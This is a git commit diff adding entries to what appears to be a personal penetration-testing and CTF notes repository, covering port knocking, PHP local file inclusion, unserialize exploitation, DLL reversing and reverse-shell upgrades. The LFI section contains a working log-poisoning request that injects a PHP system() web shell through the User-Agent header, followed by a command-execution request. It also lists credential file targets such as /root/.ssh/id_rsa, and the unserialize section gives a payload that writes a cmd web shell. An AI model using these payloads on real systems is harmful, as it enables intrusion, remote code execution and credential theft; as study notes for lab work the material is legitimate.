notes on reversing
This commit is contained in:
parent
469aeb2618
commit
375271ef5d
|
@ -0,0 +1,13 @@
|
|||
# Port Knocking
|
||||
|
||||
* Open filtered port behind a firewall by knocking nicely
|
||||
|
||||
## Usage
|
||||
|
||||
* `knockd`
|
||||
```sh
|
||||
knock <target-IP> <magicWords>
|
||||
```
|
||||
or
|
||||
* [arch wiki nmap script](https://wiki.archlinux.org/title/Port_knocking)
|
||||
* `nc -z`
|
|
@ -26,10 +26,17 @@ http://example.com/home?page=/etc/passwd
|
|||
```sh
|
||||
curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host: <TARGETIP>' -H 'User-Agent: Mozilla/5.0 <?php system($_GET['lfi']); ?> Firefox/70.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'DNT: 1' -H 'Upgrade-Insecure-Requests: 1'
|
||||
```
|
||||
* Follow up with a request to
|
||||
```HTTP
|
||||
curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'
|
||||
```
|
||||
|
||||
* Follow up with a request to
|
||||
|
||||
```HTTP
|
||||
curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'
|
||||
```
|
||||
|
||||
### /proc/self/fd
|
||||
* [outpost24](https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2)
|
||||
* Log poisoning and opening logfile via `/proc/self/fd/xx`.
|
||||
|
||||
### Base64 Encoding via PHP
|
||||
* Circumvent filter via encoding local files included ins a GET parameter value
|
||||
```http
|
||||
|
@ -48,9 +55,11 @@ curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=<
|
|||
* `/root/.ssh/id_rsa`
|
||||
* `/var/log/apache2/access.log`
|
||||
* `C:\boot.ini`
|
||||
* `/proc/self/fd/xx`
|
||||
|
||||
## Tricks
|
||||
|
||||
* Terminate query with `%00` or `0x00` does the trick until PHP 5.3.4
|
||||
* Terminate query with `/.`
|
||||
* `..//..//..//file`, double slashes
|
||||
|
||||
|
|
|
@ -0,0 +1,20 @@
|
|||
# Unserialize
|
||||
|
||||
* [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize/)
|
||||
|
||||
* Serialize via
|
||||
```php
|
||||
<?php
|
||||
class FormSubmit {
|
||||
public $form_file = 'messages.php';
|
||||
public $message = '<?php
|
||||
if(isset($_GET[\'cmd\']))
|
||||
{
|
||||
system($_GET[\'cmd\']);
|
||||
}
|
||||
?>';
|
||||
}
|
||||
|
||||
print urlencode(serialize(new FormSubmit));
|
||||
?>
|
||||
```
|
|
@ -0,0 +1,9 @@
|
|||
# DLL Reversing
|
||||
|
||||
* Start DLL on its own with the help a wrapper
|
||||
```C#
|
||||
HMODULE dll = LoadLibraryA("DLL.DLL");
|
||||
typedef void(WINAPI* Add_TypeDef)(int, int); // Add(int x, int y)
|
||||
Add_TypeDef Add = (Add_TypeDef)GetProcAddress(dll, "Add_MangledName");
|
||||
Add(1, 2);
|
||||
```
|
|
@ -0,0 +1,4 @@
|
|||
# Function Decoration
|
||||
|
||||
* Done to imported functions in order to do interpositioning and identify the variants of the function.
|
||||
* [name mangling](https://en.wikipedia.org/wiki/Name_mangling)
|
Binary file not shown.
|
@ -1,5 +1,9 @@
|
|||
# Upgrade Reverse Shell
|
||||
|
||||
* [HighOn.Coffee](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
|
||||
* [reverse shell without python](https://www.schtech.co.uk/linux-reverse-shell-without-python/)
|
||||
* [ropnop](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/)
|
||||
|
||||
## Via interpreter
|
||||
### PHP
|
||||
* reverse shell
|
||||
|
@ -24,6 +28,11 @@ python -c 'import pty; pty.spawn("/bin/bash")'
|
|||
perl -e 'exec "/bin/sh";'
|
||||
```
|
||||
|
||||
### Script
|
||||
```sh
|
||||
/usr/bin/script -qc /bin/bash /dev/null
|
||||
```
|
||||
|
||||
## Next
|
||||
1. `ctrl` + `z`
|
||||
2. `stty echo -raw`
|
||||
|
|
Loading…
Reference in New Issue